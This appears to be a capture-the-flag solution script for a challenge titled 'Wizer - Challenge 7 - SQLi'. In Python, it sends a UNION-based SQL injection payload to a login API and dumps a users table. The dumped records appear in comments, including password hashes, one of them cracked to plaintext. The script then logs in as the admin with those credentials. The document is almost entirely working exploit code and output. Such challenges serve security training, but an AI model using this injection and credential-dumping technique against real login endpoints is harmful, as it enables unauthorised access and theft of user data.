Wizer - Challenge 7 - SQLi

Exploit

import requests

url = "https://chal7.vercel.app/api/login"


# With user: isaac, password: tifat123! use the API to login as admin (login page: https://chal7.vercel.app/)


r = requests.post(
    url,
    json=[{
        "value": "isaac' UNION SELECT * FROM users WHERE type = 'admin"
    },
    {
        "value": "tifat123!"
    }],
)

print(r.text)



# [
#   {
#     "id": 1,
#     "userName": "isaac",
#     "password": "edd0d8ceaa02de2c31c2626523805ef9",
#     "firstName": "Isaac",
#     "lastName": "Newton",
#     "type": "user"
#   },
#   {
#     "id": 2,
#     "userName": "nicky",
#     "password": "a9693501a23857134ea063218bff1f4f",
#     "firstName": "Nikola",
#     "lastName": "Tesla",
#     "type": "admin"
#   }
# ]


# a9693501a23857134ea063218bff1f4f:s101101

r = requests.post(
    url,
    json=[{
        "value": "nicky"
    },
    {
        "value": "s101101"
    }],
)

print(r.text)